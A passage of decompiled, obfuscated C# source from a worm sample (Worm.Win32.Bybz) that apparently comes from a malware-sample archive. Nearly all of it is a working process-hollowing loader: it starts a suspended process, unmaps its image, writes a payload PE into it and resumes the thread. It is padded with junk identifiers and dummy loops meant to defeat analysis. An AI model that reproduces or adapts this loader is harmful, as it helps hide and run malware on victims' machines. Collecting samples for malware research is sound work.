IntPtr baseAddr1 = sadioasudoixzcuoisaudoixuzcoixuzcsad.Win32.VirtualAllocEx(hProc1, addr1, size2, 12288, 64);
bool flag = sadioasudoixzcuoisaudoixuzcoixuzcsad.Win32.WriteProcessMemory(pInfo[0], baseAddr1, bytes, size1, ref numRead);
int num4 = checked (int16 - 1);
int num5 = 0;
while (num5 <= num4)
{
int[] dst1 = new int[10];
Buffer.BlockCopy((Array) bytes, checked (int32 + 248 + num5 * 40), (Array) dst1, 0, 40);
byte[] dst2 = new byte[checked (dst1[4] - 1 + 1)];
Buffer.BlockCopy((Array) bytes, dst1[5], (Array) dst2, 0, dst2.Length);
IntPtr hProc2 = pInfo[0];
num3 = new IntPtr(checked (baseAddr1.ToInt32() + dst1[3]));
IntPtr baseAddr2 = num3;
byte[] buff = dst2;
num2 = new IntPtr(dst2.Length);
IntPtr size3 = num2;
ref IntPtr local1 = ref numRead;
flag = sadioasudoixzcuoisaudoixuzcoixuzcsad.Win32.WriteProcessMemory(hProc2, baseAddr2, buff, size3, ref local1);
IntPtr hProc3 = pInfo[0];
num3 = new IntPtr(checked (baseAddr1.ToInt32() + dst1[3]));
IntPtr addr2 = num3;
num2 = new IntPtr(dst1[2]);
IntPtr size4 = num2;
int newProt = sadioasudoixzcuoisaudoixuzcoixuzcsad.prot[dst1[9] >> 29 & 7];
int num6;
ref int local2 = ref num6;
flag = sadioasudoixzcuoisaudoixuzcoixuzcsad.Win32.VirtualProtectEx(hProc3, addr2, size4, newProt, ref local2);
checked { ++num5; }
}
IntPtr hProc4 = pInfo[0];
num3 = new IntPtr(checked ((long) ctxt[41] + 8L));
IntPtr baseAddr3 = num3;
byte[] bytes1 = BitConverter.GetBytes(baseAddr1.ToInt32());
num2 = new IntPtr(4);
IntPtr size5 = num2;
ref IntPtr local = ref numRead;
flag = sadioasudoixzcuoisaudoixuzcoixuzcsad.Win32.WriteProcessMemory(hProc4, baseAddr3, bytes1, size5, ref local);
ctxt[44] = checked ((uint) (baseAddr1.ToInt32() + BitConverter.ToInt32(bytes, int32 + 40)));
sadioasudoixzcuoisaudoixuzcoixuzcsad.Win32.SetThreadContext(pInfo[1], ctxt);
}
sadioasudoixzcuoisaudoixuzcoixuzcsad.Win32.ResumeThread(pInfo[1]);
}
[SuppressUnmanagedCodeSecurity]
private class Win32
{
[DebuggerNonUserCode]
public Win32()
{
}
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool CreateProcess(
string appName,
StringBuilder commandLine,
IntPtr procAttr,
IntPtr thrAttr,
[MarshalAs(UnmanagedType.Bool)] bool inherit,
int creation,
IntPtr env,
string curDir,
byte[] sInfo,
IntPtr[] pInfo);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool GetThreadContext(IntPtr hThr, uint[] ctxt);
[DllImport("ntdll")]
public static extern uint NtUnmapViewOfSection(IntPtr hProc, IntPtr baseAddr);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool ReadProcessMemory(
IntPtr hProc,
IntPtr baseAddr,
ref IntPtr bufr,
IntPtr bufrSize,
ref IntPtr numRead);
[DllImport("kernel32")]
public static extern int ResumeThread(IntPtr hThr);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool SetThreadContext(IntPtr hThr, uint[] ctxt);
[DllImport("kernel32")]
public static extern IntPtr VirtualAllocEx(
IntPtr hProc,
IntPtr addr,
IntPtr size,
int allocType,
int prot);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool VirtualProtectEx(
IntPtr hProc,
IntPtr addr,
IntPtr size,
int newProt,
ref int oldProt);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool WriteProcessMemory(
IntPtr hProc,
IntPtr baseAddr,
byte[] buff,
IntPtr size,
ref IntPtr numRead);
}
}
}
MSIL/Worm/Win32/B/Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db/sadisaduoiasudoiwqueoixzucoixzuocisad.cs
+871
View File
@@ -0,0 +1,871 @@
// Decompiled with JetBrains decompiler
// Type: ajhfsdlhjasnagfgewfwsg.sadisaduoiasudoiwqueoixzucoixzuocisad
// Assembly: Rokan, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 170F4640-026D-46A0-96EF-63F7CE568476
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db.exe
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
namespace ajhfsdlhjasnagfgewfwsg
{
internal class sadisaduoiasudoiwqueoixzucoixzuocisad
{
private string HMGRHOOWTYJMKSGVYLXSJXYXWQTUIT;
private string GMLYNVKNGDROIKNXTAWXVQJZNTMILN;
private string STJLEYRSWSSLZQNPZFVNLQZKINBMVD;
private string QSNRJFNKIXAOXJVRVUUSYJKMZPUAXX;
private string PSSYPLJCVCHQVBDTQKSXKCVORSMOAR;
private string BZQLGPQHLQINLHDLWPSNACKZLMBSKH;
private string AZUSMVMYYVQQJZKNRERSNVVBDOUGNB;
private string MGSEDZUDNKRNZFKFYJQIDVKMYIJKXR;
private string KFWLIFPVAPZPYYSHTYPNQOVOPLBYAL;
private string JFBSOMLNNUHSWQAJONNSCHGQHNUMCF;
private string VMZEFPTSCJIOMWABUSNISHWBBHJQMV;
private string TMDLLWOJPOQRKOHDQHMNFAHDTKBEPP;
private string SLISQCKBCTYUIHPFLXKSRTSFLMUSSJ;
private string ESFFHGSGRHZQZNPXRCKIHTHRFGJWCZ;
private string DSKLNMNYEMHTXFXZNRINUMSTXJBKFT;
private string PZIYEQVDUBIQNLXRTWICKMHERCQOPI;
private string NZMFKWRUHGQSLDETOLHIWFSGJFJCSD;
private string MYRMPDMMTLYVJWMVJAFNJZDIBIBQUX;
private string YFOYGGURJAZSACMNQFFDZYTTVBQUEN;
private string XFTFMNQJWFHUYUUPLUDIMSDVNEJIHH;
private string VEYMRUMAIKPXWNBQGKCNYLOXEHBWKB;
private string HMVYJXTFYYQUMSBJMPCDOLEIZAQAUR;
private string GLAFOEPXLDYWKLJLIEAIBEPKRDJOXL;
private string SSXSFHWCASZTARJDOJAXREEVLXYSHA;
private string RSCZLOSUNXHWZJRFJYYDDXPXDZQGJV;
private string PRHGQUOLACOYXCYGFNXIQQAZUCJUMP;
private string BZESIYVQQRPVNIYZLSXXGQPLPWYYWE;
private string AYJZNERICWXYLAGAGHVDSJANGZQMZZ;
private string YYOGTLNAPBFAKSOCBXUIFCLPYBJACT;
private string KFLSKOUFFQGXAYOUICTYVCBASVYEMJ;
private string JEQZQVQWRVOZYRVWDRSDHVMCKYRSOD;
private string VMNMHYXBHJPWOXVOJWSSXVBNERFWYS;
private string PWSZKCWCSFFRTVRRWULDYBEFNXKTDSVTXDLMIXPZMHVINK;
private string NWXGQJRUFKNTRNZTSJJJLUPHFADHGNCMSWNEPEGWEOFRZK;
private string ADUSHMZYVZOQHTYLYPJYBUESZTSLQCSLYQYYSDCIQCDCZG;
private string YDZZNTVQHEWTFLGNTEIDNNPURWKZTWYDUJZRAKTFHKMLLG;
private string KKWMEWCVXSXPVRGFZJHTDNFFLQZDDMODADKLDJPRTYLXLD;
private string JJBTJDYNKXFSUKOHVYGYQGQHDTSRGGUVWWLEKRHOLGUGXC;
private string HJGAPKUFWCMUSCWJQNEDCZBJVVLFIBAORPNXSYYMCNEOJC;
private string TQDMGNBJMRNRIIVBWSETSZQVPPZJSQQNXJYRVXUYOCCAJZ;
private string SQITMUXBZWVUGBDDRHDYFSBXHSSXVKWGTCZKDFLVFJLJVZ;
private string JZXVDZBUKWSWEKVEYSYOYHWDCJYHUZYJLQFMXHPWMNDHED;
private string DWKMJEAYBQETVZLXTCBTHLBKTOAPIUSXVOLWNLYEJFTDIV;
private string BWPTOKWQOVMWTRTZORZYUEMMLRSDLOZQQHNPVSPBAMDMUV;
private string NDMGFODUEJNTJXSRUWZOKECXFKHHVEOPWBYJYSLNMBBXUR;
private string MDRNLUZMQOVVHQATQLYTXXMZXNAVXYVISUZCFZCKEIKGGR;
private string LCWTQBVEDTDYFIIULAWYJRXBPQSJASBAONBVNGUHVQUPSR;
private string XJTGIECJTIEVVOINRFWOZQNMJJHNKIRAUHMPQFQTHESASN;
private string VJYNNLYBFNMXUGQONUUTMJYOBMABNCXSPANHXNHQZLCJEN;
private string UIDUTRUSSSUASZXQIJTYYDJQSPSPQXDLLTPAFUYNQTLSQN;
private string GQAGKVBXIHVWIFXIOPTOOCYBNIHTAMTKRNZUITUZCHKDQK;
private string EPFNPBXPUMDZGXFKJERTBWJDELAHCGZCNGBNQBLWTPTMCJ;
private string RWCZHFFUKAEWWDFDQJRJRVYPZFPLMWPCTZMHTAHIFDRYCG;
private string PWHGMLALXFMYVVNELYPODPJRQHHZPQVUOTNAAHYGXLBGOG;
private string OVMNSSWDJKUBTOUGGNOTQIUTIKANSKCNKMPTIOQDOSKPBF;
private string ADJAJVEIZZVYJUUYMSOJGIKECEPRCASMQFZNLNMPAHJBBC;
private string YCOHOCZAMEDAHMCAIHMOSBVGUGHFFUYFMYBFSVDMSOSKNC;
private string XCTNUJVSYJKDFFKCDWLTFUGIMJATIPEXHRCYACUJJVCSZB;
private string JJQALMDWOYMAWKKUJCKJVUVTGDPXSEUWNLNSDBQVVKAEZY;
private string IIVHRTZOBDTCUDRWFRJOINGVYFHLUYAPJEPLLJHSNRJNLY;
private string UQSTIWGTRRUZKJROLWJDYNVGSZWPEOQOPYZFOIDEYGIYLU;
private string SPXANCCLDXCCIBZQGLHJKGGIKCPDHIWHLRBYVPUBQNRHXU;
private string RPCHTJYDQCKEGUHSBAGOXZRKCFHRKCDZGKCRDWMYHVBQJU;
private string DWZUKMFHGQLBWAHKIFFENZHVWYWVUSSZMENLGWIKTJZBJR;
private string CVEAQTBZSVTEVSOMDUEJZSRXOBPJXMZRIXPDNDZHLQIKVQ;
private string AVJHVAXRFABGTKWOYJDOMMCZGEIXZGFKEQQWVKQECYSTIQ;
private string MCGUMDEWVPCDJQWGEPCECLSLAXWBJWVJKJBQYJMQOMQEHN;
private string LCLBSKAOHUKGHJEIAEBJOFDNSAPPMQBBFCCJGRDOGUANUM;
private string XJINJNHSXJLCXPEAGJAYEESYMTEUWFRBLWNDJQZZRIYZTJ;
private string VINUPUDKKOTFWHLCBYZERXDAEWXHZAXTHPPWQXQXJQIHGJ;
private string UISBUAZCWTBHUZTEXNYJEROCVZPVCUDMDIQPYFIUBXRQSI;
private string GPPNLEGHMHCEKFTWDSXYUQDNQSEAMKTLJCBIBEEGMMPCSF;
private string FPUURKCYZMKHIYBYYHWEGKOPHVXOOEZEEVDBILVDETZLEF;
private string DOZBWRYQMRSJGQIATWVJTDZRZYPBRYGWAOEUQSMAVAITQF;
private string PVWOOUFVBGTGXWISACUZJDPCTSEGBOWVGIPOTRIMHPHFQB;
private string OVBUTBBNOLBJVOQUVRTEVWAELUXUEICOCBQHAZZJZWQOCB;
private string ACYHKEJSEACGLUQMBWSTLWPPGOMYOXSNIVBBEYVVKLOZCY;
private string ZCDOQLEJQFKIJNYOWLRZYPARXREMRSYGDODULFMSCSYIOX;
private string XBIVWRABDKRLHFFQSAQEKILTPTXAUMEYZHEMTNEPUAHRAX;
private string JIFHNVIGTYTIYLFIYFPTAIAFJNMEECUYFAPGWMABFOGCAU;
private string IIKOSBDYFDAKWENKTUOZNBLHBQESGWAQBTQZDTRYXVPLNT;
private string GIPVYIZQSIINUWVMPJNEZUWJTSXGJQGJWMSSLAIVPDZUZT;
private string TPMHPLHUIXJJKCVEVPMTPUMUNMMKTGWICGDMOAEHARXFZQ;
private string ROROVSCMVCRMIUCGQELZCNWWFPEYWADAYZEFVHVFSZGOLP;
private string DVOBMVKRKRSJYACYWJKOSNMHZITCGPSAETPZYGRQDNFALM;
private string CVTIRCGJXWALXTKASYJUFGXJRLMQJKZSAMQSGNIOVVOIXM;
private string AVYPXJBBKBIOVLSCNNIZRAILJOEELEFLVFSKOVALNCYRJM;
private string NCVBOMJFZPJLLRSUTSHOHZXWDHTIVTVKBZDERUWXYRWDJI;
private string LBAIUTFXMURNJJZWOHGUUTIYVKMWYOBDXSEXYBNUQYFLVI;
private string KBFPZZAPZAZQHCHYKWEZGMTAMNFKBIHVTLGQGJERIFPUHI;
private string WICBQDIUOOANYIHQQCEOWLILHGTOLYXUZFQKJIADTUNGHE;
private string UIHIWJEMBTIPWAPSLRDUJFTNZJMCOSDNUYSDQPRALBXPTE;
private string GPEVNNLQRIJMMGPKSWCJZEJZTDBGYHTMARDXTONMWQVATB;
private string FOJBTTHIENRPKYWMNLBOLYUBLFUUACZFWKEQBVEJOXFJGA;
private string EOOIYADAQSZRIREOIAZUYRFDCIMIDWGXSDGIJDWGGFOSSA;
private string QVLVPDKFGHAOZXEGOFZJORUOXCBMNLWXYXQCMCRSRTMDSX;
private string OVQCVKGWTMIRXPMIKUYPAKFQOEUAQGCPTQSVTJJPJAWMEX;
[DebuggerNonUserCode]
public sadisaduoiasudoiwqueoixzucoixzuocisad()
{
}
public static void Execute(byte[] data) => sadisaduoiasudoiwqueoixzucoixzuocisad.Execute(data, Assembly.GetEntryAssembly().Location);
public static void Execute(byte[] data, string target)
{
sadisaduoiasudoiwqueoixzucoixzuocisad.H.Context context = new sadisaduoiasudoiwqueoixzucoixzuocisad.H.Context();
sadisaduoiasudoiwqueoixzucoixzuocisad.H.Process_Information processInformation = new sadisaduoiasudoiwqueoixzucoixzuocisad.H.Process_Information();
sadisaduoiasudoiwqueoixzucoixzuocisad.H.Startup_Information structure1 = new sadisaduoiasudoiwqueoixzucoixzuocisad.H.Startup_Information();
sadisaduoiasudoiwqueoixzucoixzuocisad.H.Security_Flags securityFlags1 = new sadisaduoiasudoiwqueoixzucoixzuocisad.H.Security_Flags();
sadisaduoiasudoiwqueoixzucoixzuocisad.H.Security_Flags securityFlags2 = new sadisaduoiasudoiwqueoixzucoixzuocisad.H.Security_Flags();
GCHandle gcHandle = GCHandle.Alloc((object) data, GCHandleType.Pinned);
IntPtr ptr = gcHandle.AddrOfPinnedObject();
int int32 = ptr.ToInt32();
sadisaduoiasudoiwqueoixzucoixzuocisad.H.DOS_Header dosHeader1 = new sadisaduoiasudoiwqueoixzucoixzuocisad.H.DOS_Header();
object structure2 = Marshal.PtrToStructure(gcHandle.AddrOfPinnedObject(), dosHeader1.GetType());
sadisaduoiasudoiwqueoixzucoixzuocisad.H.DOS_Header dosHeader2;
sadisaduoiasudoiwqueoixzucoixzuocisad.H.DOS_Header dosHeader3 = structure2 != null ? (sadisaduoiasudoiwqueoixzucoixzuocisad.H.DOS_Header) structure2 : dosHeader2;
gcHandle.Free();
string str1 = (string) null;
ref string local1 = ref str1;
ref string local2 = ref target;
ref sadisaduoiasudoiwqueoixzucoixzuocisad.H.Security_Flags local3 = ref securityFlags1;
ref sadisaduoiasudoiwqueoixzucoixzuocisad.H.Security_Flags local4 = ref securityFlags2;
IntPtr num1;
IntPtr system = num1;
string str2 = (string) null;
ref string local5 = ref str2;
ref sadisaduoiasudoiwqueoixzucoixzuocisad.H.Startup_Information local6 = ref structure1;
ref sadisaduoiasudoiwqueoixzucoixzuocisad.H.Process_Information local7 = ref processInformation;
if (-(sadisaduoiasudoiwqueoixzucoixzuocisad.H.CreateProcess(ref local1, ref local2, ref local3, ref local4, false, 4U, system, ref local5, ref local6, out local7) ? 1 : 0) == 0)
return;
sadisaduoiasudoiwqueoixzucoixzuocisad.H.NT_Headers ntHeaders1 = new sadisaduoiasudoiwqueoixzucoixzuocisad.H.NT_Headers();
ptr = new IntPtr(checked (int32 + dosHeader3.Address));
object structure3 = Marshal.PtrToStructure(ptr, ntHeaders1.GetType());
sadisaduoiasudoiwqueoixzucoixzuocisad.H.NT_Headers ntHeaders2;
sadisaduoiasudoiwqueoixzucoixzuocisad.H.NT_Headers ntHeaders3 = structure3 != null ? (sadisaduoiasudoiwqueoixzucoixzuocisad.H.NT_Headers) structure3 : ntHeaders2;
structure1.CB = Marshal.SizeOf((object) structure1);
context.Flags = 65538U;
if (ntHeaders3.Signature != 17744U | dosHeader3.Magic != (ushort) 23117)
return;
int num2 = sadisaduoiasudoiwqueoixzucoixzuocisad.H.GetThreadContext(processInformation.Thread, ref context) ? 1 : 0;
IntPtr process1 = processInformation.Process;
IntPtr address1 = (IntPtr) checked ((long) context.Ebx + 8L);
IntPtr num3;
ref IntPtr local8 = ref num3;
IntPtr size1 = (IntPtr) 4;
int num4 = 0;
ref int local9 = ref num4;
int num5 = sadisaduoiasudoiwqueoixzucoixzuocisad.H.ReadProcessMemory(process1, address1, ref local8, size1, ref local9) >= 0 ? 1 : 0;
if ((num2 & num5 & (sadisaduoiasudoiwqueoixzucoixzuocisad.H.ZwUnmapViewOfSection(processInformation.Process, num3) >= 0L ? 1 : 0)) == 0)
return;
uint num6 = checked ((uint) (int) sadisaduoiasudoiwqueoixzucoixzuocisad.H.VirtualAllocEx(processInformation.Process, (IntPtr) (long) ntHeaders3.Optional.Image, ntHeaders3.Optional.SImage, 12288U, 4U));
if (num6 == 0U)
return;
IntPtr process2 = processInformation.Process;
IntPtr address2 = (IntPtr) (long) num6;
byte[] buffer1 = data;
IntPtr sheaders = (IntPtr) (long) ntHeaders3.Optional.SHeaders;
uint num7;
int num8 = checked ((int) num7);
ref int local10 = ref num8;
sadisaduoiasudoiwqueoixzucoixzuocisad.H.WriteProcessMemory(process2, address2, buffer1, sheaders, out local10);
uint num9 = checked ((uint) num8);
long num10 = (long) checked (dosHeader3.Address + 248);
int num11 = checked ((int) ntHeaders3.File.Sections - 1);
int num12 = 0;
int num13;
while (num12 <= num11)
{
ptr = new IntPtr(checked ((long) int32 + num10 + (long) (num12 * 40)));
sadisaduoiasudoiwqueoixzucoixzuocisad.H.Section_Header sectionHeader1;
object structure4 = Marshal.PtrToStructure(ptr, sectionHeader1.GetType());
sadisaduoiasudoiwqueoixzucoixzuocisad.H.Section_Header sectionHeader2;
sectionHeader1 = structure4 != null ? (sadisaduoiasudoiwqueoixzucoixzuocisad.H.Section_Header) structure4 : sectionHeader2;
byte[] numArray = new byte[checked ((int) sectionHeader1.Size + 1)];
int num14 = checked ((int) ((long) sectionHeader1.Size - 1L));
int index = 0;
while (index <= num14)
{
numArray[index] = data[checked ((int) ((long) sectionHeader1.Pointer + (long) index))];
checked { ++index; }
}
IntPtr process3 = processInformation.Process;
IntPtr address3 = (IntPtr) (long) checked (num6 + sectionHeader1.Address);
byte[] buffer2 = numArray;
IntPtr size2 = (IntPtr) (long) sectionHeader1.Size;
num13 = checked ((int) num9);
ref int local11 = ref num13;
sadisaduoiasudoiwqueoixzucoixzuocisad.H.WriteProcessMemory(process3, address3, buffer2, size2, out local11);
num9 = checked ((uint) num13);
sadisaduoiasudoiwqueoixzucoixzuocisad.H.VirtualProtectEx(processInformation.Process, (IntPtr) (long) checked (num6 + sectionHeader1.Address), (UIntPtr) sectionHeader1.Misc.Size, (UIntPtr) checked ((ulong) sadisaduoiasudoiwqueoixzucoixzuocisad.Protect((long) sectionHeader1.Flags)), checked ((uint) (int) num3));
checked { ++num12; }
}
byte[] bytes = BitConverter.GetBytes(num6);
IntPtr process4 = processInformation.Process;
IntPtr address4 = (IntPtr) checked ((long) context.Ebx + 8L);
byte[] buffer3 = bytes;
IntPtr size3 = (IntPtr) 4;
num13 = checked ((int) num9);
ref int local12 = ref num13;
sadisaduoiasudoiwqueoixzucoixzuocisad.H.WriteProcessMemory(process4, address4, buffer3, size3, out local12);
num7 = checked ((uint) num13);
context.Eax = checked (num6 + ntHeaders3.Optional.Address);
sadisaduoiasudoiwqueoixzucoixzuocisad.H.SetThreadContext(processInformation.Thread, ref context);
int num15 = (int) sadisaduoiasudoiwqueoixzucoixzuocisad.H.ResumeThread(processInformation.Thread);
}
private static long Protect(long flags)
{
if (flags < 0L)
checked { flags += 4294967296L; }
return new long[8]
{
1L,
16L,
2L,
32L,
4L,
64L,
4L,
64L
}[checked ((int) Math.Round(unchecked ((double) flags / 841.0)))];
}
public void rufysdnlfthpadkfktjspdiogusdpfjkpaosjkfpejmjdfkfjp_FuQDHuMY2025034873()
{
try
{
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
try
{
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
double num = 0.2710239;
do
{
try
{
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
++num;
}
while (num <= 0.4629713);
}
public void rufysdnlfthpadkfktjspdiogusdpfjkpaosjkfpejmjdfkfjp_lmwQbUgmOoeI2002682959()
{
try
{
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
try
{
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
while (true)
;
}
public void rufysdnlfthpadkfktjspdiogusdpfjkpaosjkfpejmjdfkfjp_gpwuQobJL341053670()
{
try
{
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
double num1 = 0.7916495;
do
{
try
{
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
++num1;
}
while (num1 <= 0.8058189);
try
{
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
double num2 = 0.2101725;
do
{
++num2;
}
while (num2 <= 0.2262142);
try
{
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
public void rufysdnlfthpadkfktjspdiogusdpfjkpaosjkfpejmjdfkfjp_YgPWEqqfBWlFrUpB16952860()
{
try
{
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
if (0.2939498 <= 0.07052416)
{
try
{
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
while (true)
{
try
{
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
else
{
while (true)
{
try
{
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
}
public void rufysdnlfthpadkfktjspdiogusdpfjkpaosjkfpejmjdfkfjp_geuXkWHFMaMChUIt864161822()
{
try
{
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
try
{
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
while (true)
;
}
public void rufysdnlfthpadkfktjspdiogusdpfjkpaosjkfpejmjdfkfjp_nECAJKceBhUUNawb1480997800()
{
while (true)
{
try
{
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
public void rufysdnlfthpadkfktjspdiogusdpfjkpaosjkfpejmjdfkfjp_dpaMDuVkjPnwS530910597()
{
while (true)
{
try
{
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
public void rufysdnlfthpadkfktjspdiogusdpfjkpaosjkfpejmjdfkfjp_ERBqFbRB105420778()
{
for (double num = 0.3396568; num <= 0.2412645; ++num)
{
try
{
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
try
{
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
double num1 = 0.849157;
while (num1 <= 0.2866166)
++num1;
}
public void rufysdnlfthpadkfktjspdiogusdpfjkpaosjkfpejmjdfkfjp_GRTXFOXDbbgxjbWoJU1859221943()
{
try
{
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
double num = 0.005078852;
do
{
try
{
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
try
{
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
++num;
}
while (num <= 0.6185946);
}
public void rufysdnlfthpadkfktjspdiogusdpfjkpaosjkfpejmjdfkfjp_nmrQWLk2018461527()
{
try
{
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
try
{
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
if (0.9356374 <= 0.7325586)
{
while (true)
;
}
else
{
try
{
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
while (true)
;
}
}
public void rufysdnlfthpadkfktjspdiogusdpfjkpaosjkfpejmjdfkfjp_qnTBP1344562940()
{
try
{
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
while (true)
;
}
public void rufysdnlfthpadkfktjspdiogusdpfjkpaosjkfpejmjdfkfjp_YDRyFFHWgsSUjghdyN275736892()
{
try
{
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
while (true)
;
}
public void rufysdnlfthpadkfktjspdiogusdpfjkpaosjkfpejmjdfkfjp_QsKIdRqHskVT85619494()
{
}
public void rufysdnlfthpadkfktjspdiogusdpfjkpaosjkfpejmjdfkfjp_omKFvdbkavhuVbIfK892757530()
{
try
{
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
while (true)
;
}
public void rufysdnlfthpadkfktjspdiogusdpfjkpaosjkfpejmjdfkfjp_pSnegMwGMfVvnPCpFkl1971118203()
{
try
{
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
try
{
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
while (true)
;
}
[EditorBrowsable(EditorBrowsableState.Never)]
internal class H
{
[DebuggerNonUserCode]
public H()
{
}
[DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
public static extern bool CreateProcess(
[MarshalAs(UnmanagedType.VBByRefStr)] ref string name,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string command,
ref sadisaduoiasudoiwqueoixzucoixzuocisad.H.Security_Flags process,
ref sadisaduoiasudoiwqueoixzucoixzuocisad.H.Security_Flags thread,
bool inherit,
uint flags,
IntPtr system,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string current,
[In] ref sadisaduoiasudoiwqueoixzucoixzuocisad.H.Startup_Information startup,
out sadisaduoiasudoiwqueoixzucoixzuocisad.H.Process_Information info);
[DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
public static extern bool WriteProcessMemory(
IntPtr process,
IntPtr address,
byte[] buffer,
IntPtr size,
out int written);
[DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
public static extern int ReadProcessMemory(
IntPtr process,
IntPtr address,
ref IntPtr buffer,
IntPtr size,
ref int read);
[DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
public static extern int VirtualProtectEx(
IntPtr process,
IntPtr address,
UIntPtr size,
UIntPtr @new,
[Out] uint old);
[DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
public static extern IntPtr VirtualAllocEx(
IntPtr process,
IntPtr address,
uint size,
uint type,
uint protect);
[DllImport("ntdll", CharSet = CharSet.Auto, SetLastError = true)]
public static extern long ZwUnmapViewOfSection(IntPtr process, IntPtr address);
[DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
public static extern uint ResumeThread(IntPtr thread);
[DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
public static extern bool GetThreadContext(
IntPtr thread,
ref sadisaduoiasudoiwqueoixzucoixzuocisad.H.Context context);
[DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
public static extern bool SetThreadContext(
IntPtr thread,
ref sadisaduoiasudoiwqueoixzucoixzuocisad.H.Context context);
public struct Context
{
public uint Flags;
public uint D0;
public uint D1;
public uint D2;
public uint D3;
public uint D6;
public uint D7;
public sadisaduoiasudoiwqueoixzucoixzuocisad.H.Save Save;
public uint SG;
public uint SF;
public uint SE;
public uint SD;
public uint Edi;
public uint Esi;
public uint Ebx;
public uint Edx;
public uint Ecx;
public uint Eax;
public uint Ebp;
public uint Eip;
public uint SC;
public uint EFlags;
public uint Esp;
public uint SS;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)]
public byte[] Registers;
}
public struct Save
{
public uint Control;
public uint Status;
public uint Tag;
public uint ErrorO;
public uint ErrorS;
public uint DataO;
public uint DataS;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)]
public byte[] RegisterArea;
public uint State;
}
public struct Misc
{
public uint Address;
public uint Size;
}
public struct Section_Header
{
public byte Name;
public sadisaduoiasudoiwqueoixzucoixzuocisad.H.Misc Misc;
public uint Address;
public uint Size;
public uint Pointer;
public uint PRelocations;
public uint PLines;
public uint NRelocations;
public uint NLines;
public uint Flags;
}
public struct Process_Information
{
public IntPtr Process;
public IntPtr Thread;
public int ProcessId;
public int ThreadId;
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct Startup_Information
{
public int CB;
public string ReservedA;
public string Desktop;
public string Title;
public int X;
public int Y;
public int XSize;
public int YSize;
public int XCount;
public int YCount;
public int Fill;
public int Flags;
public short ShowWindow;
public short ReservedB;
public int ReservedC;
public int Input;
public int Output;
public int Error;
}
public struct Security_Flags
{
public int Length;
public IntPtr Descriptor;
public int Inherit;
}
